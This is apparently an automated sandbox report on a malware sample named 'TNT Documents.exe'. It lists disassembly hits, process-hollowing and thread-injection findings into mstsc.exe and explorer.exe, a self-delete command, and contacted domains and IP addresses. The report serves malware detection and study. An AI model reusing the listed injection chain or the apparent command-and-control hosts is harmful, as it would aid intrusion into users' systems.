          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA44B mov eax, dword ptr fs:[00000030h]17_2_055EA44B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D746D mov eax, dword ptr fs:[00000030h]17_2_055D746D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564C450 mov eax, dword ptr fs:[00000030h]17_2_0564C450
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564C450 mov eax, dword ptr fs:[00000030h]17_2_0564C450
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h]17_2_05671C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568740D mov eax, dword ptr fs:[00000030h]17_2_0568740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568740D mov eax, dword ptr fs:[00000030h]17_2_0568740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568740D mov eax, dword ptr fs:[00000030h]17_2_0568740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]17_2_05636C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]17_2_05636C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]17_2_05636C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h]17_2_05636C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EBC2C mov eax, dword ptr fs:[00000030h]17_2_055EBC2C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h]17_2_05636CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h]17_2_05636CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h]17_2_05636CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056714FB mov eax, dword ptr fs:[00000030h]17_2_056714FB
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688CD6 mov eax, dword ptr fs:[00000030h]17_2_05688CD6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C849B mov eax, dword ptr fs:[00000030h]17_2_055C849B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688F6A mov eax, dword ptr fs:[00000030h]17_2_05688F6A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CEF40 mov eax, dword ptr fs:[00000030h]17_2_055CEF40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CFF60 mov eax, dword ptr fs:[00000030h]17_2_055CFF60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DF716 mov eax, dword ptr fs:[00000030h]17_2_055DF716
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA70E mov eax, dword ptr fs:[00000030h]17_2_055EA70E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA70E mov eax, dword ptr fs:[00000030h]17_2_055EA70E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568070D mov eax, dword ptr fs:[00000030h]17_2_0568070D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0568070D mov eax, dword ptr fs:[00000030h]17_2_0568070D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EE730 mov eax, dword ptr fs:[00000030h]17_2_055EE730
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564FF10 mov eax, dword ptr fs:[00000030h]17_2_0564FF10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564FF10 mov eax, dword ptr fs:[00000030h]17_2_0564FF10
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B4F2E mov eax, dword ptr fs:[00000030h]17_2_055B4F2E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B4F2E mov eax, dword ptr fs:[00000030h]17_2_055B4F2E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F37F5 mov eax, dword ptr fs:[00000030h]17_2_055F37F5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C8794 mov eax, dword ptr fs:[00000030h]17_2_055C8794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637794 mov eax, dword ptr fs:[00000030h]17_2_05637794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637794 mov eax, dword ptr fs:[00000030h]17_2_05637794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637794 mov eax, dword ptr fs:[00000030h]17_2_05637794
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]17_2_055C7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]17_2_055C7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]17_2_055C7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]17_2_055C7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]17_2_055C7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h]17_2_055C7E41
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567AE44 mov eax, dword ptr fs:[00000030h]17_2_0567AE44
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567AE44 mov eax, dword ptr fs:[00000030h]17_2_0567AE44
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]17_2_055DAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]17_2_055DAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]17_2_055DAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]17_2_055DAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h]17_2_055DAE73
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C766D mov eax, dword ptr fs:[00000030h]17_2_055C766D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA61C mov eax, dword ptr fs:[00000030h]17_2_055EA61C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA61C mov eax, dword ptr fs:[00000030h]17_2_055EA61C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566FE3F mov eax, dword ptr fs:[00000030h]17_2_0566FE3F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h]17_2_055BC600
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h]17_2_055BC600
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h]17_2_055BC600
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E8E00 mov eax, dword ptr fs:[00000030h]17_2_055E8E00
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05671608 mov eax, dword ptr fs:[00000030h]17_2_05671608
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BE620 mov eax, dword ptr fs:[00000030h]17_2_055BE620
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E36CC mov eax, dword ptr fs:[00000030h]17_2_055E36CC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F8EC7 mov eax, dword ptr fs:[00000030h]17_2_055F8EC7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566FEC0 mov eax, dword ptr fs:[00000030h]17_2_0566FEC0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688ED6 mov eax, dword ptr fs:[00000030h]17_2_05688ED6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E16E0 mov ecx, dword ptr fs:[00000030h]17_2_055E16E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C76E2 mov eax, dword ptr fs:[00000030h]17_2_055C76E2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056346A7 mov eax, dword ptr fs:[00000030h]17_2_056346A7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h]17_2_05680EA5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h]17_2_05680EA5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h]17_2_05680EA5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564FE87 mov eax, dword ptr fs:[00000030h]17_2_0564FE87
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DB944 mov eax, dword ptr fs:[00000030h]17_2_055DB944
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DB944 mov eax, dword ptr fs:[00000030h]17_2_055DB944
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB171 mov eax, dword ptr fs:[00000030h]17_2_055BB171
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB171 mov eax, dword ptr fs:[00000030h]17_2_055BB171
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BC962 mov eax, dword ptr fs:[00000030h]17_2_055BC962
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h]17_2_055B9100
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h]17_2_055B9100
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h]17_2_055B9100
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E513A mov eax, dword ptr fs:[00000030h]17_2_055E513A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E513A mov eax, dword ptr fs:[00000030h]17_2_055E513A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]17_2_055D4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]17_2_055D4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]17_2_055D4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h]17_2_055D4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D4120 mov ecx, dword ptr fs:[00000030h]17_2_055D4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056441E8 mov eax, dword ptr fs:[00000030h]17_2_056441E8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h]17_2_055BB1E1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h]17_2_055BB1E1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h]17_2_055BB1E1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056369A6 mov eax, dword ptr fs:[00000030h]17_2_056369A6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2990 mov eax, dword ptr fs:[00000030h]17_2_055E2990
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EA185 mov eax, dword ptr fs:[00000030h]17_2_055EA185
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]17_2_056351BE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]17_2_056351BE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]17_2_056351BE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056351BE mov eax, dword ptr fs:[00000030h]17_2_056351BE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DC182 mov eax, dword ptr fs:[00000030h]17_2_055DC182
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E61A0 mov eax, dword ptr fs:[00000030h]17_2_055E61A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E61A0 mov eax, dword ptr fs:[00000030h]17_2_055E61A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D0050 mov eax, dword ptr fs:[00000030h]17_2_055D0050
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055D0050 mov eax, dword ptr fs:[00000030h]17_2_055D0050
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05672073 mov eax, dword ptr fs:[00000030h]17_2_05672073
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05681074 mov eax, dword ptr fs:[00000030h]17_2_05681074
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]17_2_055E002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]17_2_055E002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]17_2_055E002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]17_2_055E002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E002D mov eax, dword ptr fs:[00000030h]17_2_055E002D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637016 mov eax, dword ptr fs:[00000030h]17_2_05637016
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637016 mov eax, dword ptr fs:[00000030h]17_2_05637016
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05637016 mov eax, dword ptr fs:[00000030h]17_2_05637016
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]17_2_055CB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]17_2_055CB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]17_2_055CB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h]17_2_055CB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05684015 mov eax, dword ptr fs:[00000030h]17_2_05684015
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05684015 mov eax, dword ptr fs:[00000030h]17_2_05684015
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]17_2_0564B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov ecx, dword ptr fs:[00000030h]17_2_0564B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]17_2_0564B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]17_2_0564B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]17_2_0564B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h]17_2_0564B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B58EC mov eax, dword ptr fs:[00000030h]17_2_055B58EC
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055B9080 mov eax, dword ptr fs:[00000030h]17_2_055B9080
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EF0BF mov ecx, dword ptr fs:[00000030h]17_2_055EF0BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EF0BF mov eax, dword ptr fs:[00000030h]17_2_055EF0BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EF0BF mov eax, dword ptr fs:[00000030h]17_2_055EF0BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05633884 mov eax, dword ptr fs:[00000030h]17_2_05633884
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05633884 mov eax, dword ptr fs:[00000030h]17_2_05633884
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055F90AF mov eax, dword ptr fs:[00000030h]17_2_055F90AF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]17_2_055E20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]17_2_055E20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]17_2_055E20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]17_2_055E20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]17_2_055E20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h]17_2_055E20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BF358 mov eax, dword ptr fs:[00000030h]17_2_055BF358
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BDB40 mov eax, dword ptr fs:[00000030h]17_2_055BDB40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E3B7A mov eax, dword ptr fs:[00000030h]17_2_055E3B7A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E3B7A mov eax, dword ptr fs:[00000030h]17_2_055E3B7A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05688B58 mov eax, dword ptr fs:[00000030h]17_2_05688B58
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055BDB60 mov ecx, dword ptr fs:[00000030h]17_2_055BDB60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567131B mov eax, dword ptr fs:[00000030h]17_2_0567131B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056353CA mov eax, dword ptr fs:[00000030h]17_2_056353CA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_056353CA mov eax, dword ptr fs:[00000030h]17_2_056353CA
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055DDBE9 mov eax, dword ptr fs:[00000030h]17_2_055DDBE9
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]17_2_055E03E2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]17_2_055E03E2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]17_2_055E03E2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]17_2_055E03E2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]17_2_055E03E2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h]17_2_055E03E2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E2397 mov eax, dword ptr fs:[00000030h]17_2_055E2397
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_05685BA5 mov eax, dword ptr fs:[00000030h]17_2_05685BA5
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055EB390 mov eax, dword ptr fs:[00000030h]17_2_055EB390
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C1B8F mov eax, dword ptr fs:[00000030h]17_2_055C1B8F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055C1B8F mov eax, dword ptr fs:[00000030h]17_2_055C1B8F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566D380 mov ecx, dword ptr fs:[00000030h]17_2_0566D380
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0567138A mov eax, dword ptr fs:[00000030h]17_2_0567138A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h]17_2_055E4BAD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h]17_2_055E4BAD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h]17_2_055E4BAD
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566B260 mov eax, dword ptr fs:[00000030h]17_2_0566B260
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 17_2_0566B260 mov eax, dword ptr fs:[00000030h]17_2_0566B260
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 7_2_00409B50 LdrLoadDll,7_2_00409B50
          Source: C:\Users\user\Desktop\TNT Documents.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.metronixmedical.com
          Source: C:\Windows\explorer.exeDomain query: www.specialtyplastics.online
          Source: C:\Windows\explorer.exeNetwork Connect: 51.255.30.106 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 119.18.54.99 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cortepuroiberico.com
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.coached.info
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\TNT Documents.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: EC0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\TNT Documents.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\TNT Documents.exeMemory written: C:\Users\user\Desktop\TNT Documents.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TNT Documents.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TNT Documents.exeThread register set: target process: 3292Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 3292Jump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess created: C:\Users\user\Desktop\TNT Documents.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeProcess created: C:\Users\user\Desktop\TNT Documents.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"Jump to behavior
          Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.319293642.0000000005F40000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.336206590.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.314892260.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.294735677.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 0000000B.00000000.344277023.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.323053985.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Users\user\Desktop\TNT Documents.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TNT Documents.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
